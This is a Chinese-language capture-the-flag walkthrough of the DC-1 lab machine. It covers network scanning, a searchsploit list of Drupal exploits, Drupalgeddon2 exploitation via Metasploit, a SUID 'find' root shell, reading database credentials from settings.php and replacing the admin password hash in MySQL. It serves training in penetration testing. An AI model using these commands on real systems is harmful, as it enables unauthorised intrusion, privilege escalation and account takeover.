DC -1****
把 dc 靶机设置为 nat 模式,使得其与 kali 处于同一个网段;
信息收集****
1. 扫描主机 IP****
先使用 kali 进行同网段扫描(kali 使用 root 权限)
· arp-scan —— 基于 ARP 协议的主机扫描工具
· -l —— 扫描本地网络接口所在的整个网段(local network)
因为它在二层工作,不依赖目标开放任何端口。即使靶机防火墙全开,ARP 请求也会得到响应。这是黑盒下最轻量、最不打扰目标的主机发现方式。
.1 .2 .254 分别是VMware 网关固定地址,VMware DHCP 固定地址,VMware 虚拟网络组件固定地址;
2. 扫描端口****
http-generator: Drupal 7 (drupal.org)
http-title: Welcome to Drupal Site | Drupal Site
· Drupal 7 有一个著名的远程代码执行漏洞 CVE-2018-7600(俗称 Drupalgeddon2)
3. 指纹识别****
结合你之前 nmap 扫到的 http-generator: Drupal 7,确认是 Drupal 7。
whatweb http://192.168.174.139
使用 whatweb 命令也能的到版本号就是CMS 版本为 Drupal 7
3.1. 获取精确版本号****
Drupal 7 默认在网站根目录放置 CHANGELOG.txt,里面第一行就是当前版本号。
curl -s http://192.168.174.139/CHANGELOG.txt | head -5
4. 知道版本后查找漏洞****
这是 Kali 自带的 Exploit-DB 离线查询工具,会列出所有和 Drupal 7 相关的 exp。
┌──(root㉿kali)-[/home/big1tall/桌面]
└─# searchsploit drupal 7
Exploit Title | Path
Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Executi | php/remote/46510.rb
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Executi | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt
Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS) | php/webapps/50841.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Mu | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection | php/webapps/33410.txt
Shellcodes: No Results
如果目标是 Drupal 7.x,以下几个利用脚本最值得关注(按优先级排序):
| 漏洞名称 | 影响版本 | 脚本路径 | 说明 |
|---|---|---|---|
| Drupalgeddon2 | Drupal < 8.3.9 / < 8.4.6 / < 8.5.1(含 7.x 部分版本) | php/webapps/44449.rb | 最著名的 RCE 漏洞,Metasploit 模块,可远程执行代码 |
| Drupalgeddon3 | Drupal < 7.58 | php/webapps/44557.rb | 认证后的 RCE,需要登录权限 |
| Drupalgeddon SQL Injection | Drupal 7.0 < 7.31 | php/webapps/34992.py | 可添加管理员用户的 SQL 注入 |
| Drupal 7.x Module Services RCE | Drupal 7.x | php/webapps/41564.php | 模块相关的远程代码执行 |
| Drupal Module RESTWS 7.x RCE | Drupal 7.x | php/remote/40130.rb | Metasploit 模块,针对 RESTWS 模块 |
5. 确定漏洞进行尝试****
我们先尝试 Drupalgeddon2(CVE-2018-7600)
“找到一个 CVE-2018-7600 编号的漏洞,我们可以选择用下载的 exp 和 poc 去验证”
· CVE-2018-7600 = Drupalgeddon2,这是漏洞的“身份证号”
· exp(Exploit) = 利用代码,能真正打进去、拿到权限的脚本
· poc(Proof of Concept) = 概念验证,证明漏洞存在的代码,不一定能拿权限
· “下载的 exp 和 poc” = 你可以从 GitHub、Exploit-DB 等地方下载别人写好的脚本,手动跑
这里我们选择用 kali 自带的 msfconsole 来进行攻击,msfconsole 已经将这个漏洞的 exp 和 poc 集成进去了!
5.1. 使用 msfconsole 框架****
Rank 是 excellent(最高等级),说明这个 exp 成功率很高。每个模块会显示一个 Rank(等级) ,用来表示这个漏洞利用代码的可靠程度和成功率。
5.2. 选择模块****
use exploit/unix/webapp/drupal_drupalgeddon2
5.3. 查看需要填什么****
图片丢给 ai,我们知道了需要填入RHOSTS(目标 ip)
5.4. 填入目标 ip****
5.5. run 执行****
· Meterpreter session 1 opened —— 会话建立成功
· meterpreter > —— 你现在已经进入目标机器的 Meterpreter 控制台
· www-data 权限的 shell(Drupal 默认运行用户)
6. 本地提权****
这个提示符表示:你正在通过 Meterpreter 控制 DC-1。
· 你的控制对象:DC-1 靶机(192.168.174.139)
6.1. 查看当前在目标系统里的用户身份****
6.2. 进入 shell 并收集信息****
shell 从 Meterpreter 的“高级控制台”,切换到目标系统真正的命令行终端。
meterpreter >:像是一个“遥控器”,你可以用它按按钮(getuid、sysinfo、upload),但不能直接敲系统命令。
shell:相当于把目标机器的“键盘和屏幕”借过来,让你能像坐在那台机器前一样,直接输入 ls、cat、whoami 这些 Linux 命令。
正常而言应该是会出提示符 # 或者 $ ,这里没有出现,我输入 id 发现有结果,说明 shell 成功了;只是没有提示符而已;
python -c "import pty;pty.spawn('/bin/bash')"
得到一个更完整的交互式 shell,支持 tab 补全、clear、su 等。
观察****
1.1. 收集提权信息****
uname -a
cat /etc/passwd
find / -perm -4000 -type f 2>/dev/null
· uname -a:查看内核版本,判断是否有内核提权漏洞可利用。
· cat /etc/passwd:查看系统用户列表,寻找可疑账号或可登录账号。
· find / -perm -4000 -type f 2>/dev/null:查找所有 SUID 程序,这是 Linux 本地提权最常见的突破口。
我们收集发现,find 有 suid 权限,这样的话任何用户在进行 find 命令时都有 root 权限;
1.2. find 提权****
· -exec /bin/sh ;:对找到的第一个文件,执行 /bin/sh(启动一个 Shell)。; 是 -exec 的结束符,必须加。
效果:由于 find 带有 SUID 权限,它启动的 /bin/sh会继承 root 权限,你就拿到了一个 root Shell。
find . -exec /bin/sh -p ; -quit
1.3. 寻找 flag****
Every good CMS needs a config file - and so do you.
每个好的 CMS 都需要一个配置文件——你也是。
1.4. 寻找配置文件****
cd /sites/default
cat settings.php
先用 find 找到所有名为 settings.php 的文件,然后 cat 把它们的路径当成命令去执行。
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
1.5. 登录数据库****
mysql -udbuser -pR0ck3t drupaldb
1.6. 更换密钥****
现在我得到的密码是密文,且不可逆,所以现在我们要设置一个新密码,把他加密,然后使用该密文替换旧密文;
scripts/ 是 Drupal 自带的一个固定目录,里面放着官方提供的命令行脚本。
php scripts/password-hash.sh '123456'
1.7. 登录 mysql,替换密码****
mysql -u dbuser -p'R0ck3t' drupaldb
update users set pass='Dq7E6Tli4fljQuzJnjbPjDfO/jJVafWYa0F3Pvs022.Ulc.JlhLm' where name='admin';
1.8. 登录网站****
现在我们就要去提权,上面的提示就是对应的 find 提权,我们之前就知道了;
1.9. 查看 /etc/passwd****
1.10. 寻找 flag4****
# cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
cat /flag4.txt
cat /flag4.txt
cat: /flag4.txt: No such file or directory
去访问得到这句话,翻译过来就是 你能用同样的方法,找到或访问 root 目录下的 flag 吗?大概可以。但也许没那么简单。或者也许很简单?
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
//
Well done!!!!
干得漂亮!!!!
Hopefully you've enjoyed this and learned some new skills.
希望你喜欢这个过程,并且学到了一些新技能。
You can let me know what you thought of this little journey by contacting me via Twitter - @DCAU7
你可以通过 Twitter 联系我(@DCAU7),告诉我你对这段小旅程的看法。